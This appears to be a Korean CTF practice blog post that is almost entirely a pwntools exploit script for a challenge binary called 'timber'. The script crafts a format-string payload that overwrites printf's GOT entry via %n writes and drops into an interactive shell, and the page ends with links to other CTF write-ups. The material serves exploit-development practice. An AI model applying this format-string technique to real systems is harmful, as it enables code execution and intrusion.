exploit.py
from pwn import *
p = process("./timber")
e = ELF("./timber")
print p.recvuntil("name: ")
date_low = 0x867b
date_high = 0x10804
printf_got = e.got["printf"]
payload = p32(printf_got)
payload += p32(printf_got+2)
payload += "%5${0}x".format(date_low-8)
payload += "%2$n"
payload += "%6${0}x".format(date_high-date_low)
payload += "%3$n"
p.sendline(payload)
p.interactive()
'System > Pwnable Practice' 카테고리의 다른 글
| pico CTF 2018 echo back (0) | 2019.08.12 |
|---|---|
| picoCTF 2018 authenticate (0) | 2019.08.10 |
| TUCTF CTF 2018 Ehh (0) | 2019.08.09 |
| Plaid CTF 2015 ebp (0) | 2019.08.06 |
| Layer7 CTF 2018 Life Game (0) | 2019.08.05 |
JeonYoungSin
메모 기록용 공간